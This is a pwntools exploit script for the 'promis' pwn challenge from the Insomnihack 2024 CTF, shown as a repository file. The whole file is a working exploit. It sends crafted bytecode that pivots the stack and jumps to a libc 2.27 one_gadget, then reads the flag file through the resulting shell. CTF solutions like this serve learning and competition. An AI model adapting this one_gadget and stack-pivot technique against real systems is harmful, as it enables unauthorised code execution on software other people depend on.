Files
ctf/2024/insomnihack/pwn/promis/exploit.py
2025-06-06 03:13:31 +02:00

24 lines
642 B
Python

from pwn import *
context.binary = ELF("./promis_patched")
libc = ELF("./libc-2.27.so")
ld = ELF("./ld-2.27.so")
p = process(context.binary.path)
#p = remote("promis.insomnihack.ch", 6666, fam="ipv4")
load_long = b"\x16"
add = b"\x20"
move_stack = b"\x28"
weird_pop = b"\x36"
set_val = b"\x56"
p.sendlineafter(b"choice: ", b"1aaa")
one_gadget_offset = 0x4f29e
diff = one_gadget_offset - (libc.symbols["__libc_start_main"] + 231)
code = move_stack + move_stack + weird_pop * 2 + set_val + p32(diff & 0xFFFFFFFFFFFFFFFF) + add + weird_pop * 5 + b"\x00"
p.sendline(code)
p.sendline(b"cat flag.txt")
flag = p.recvline()
print(flag.decode())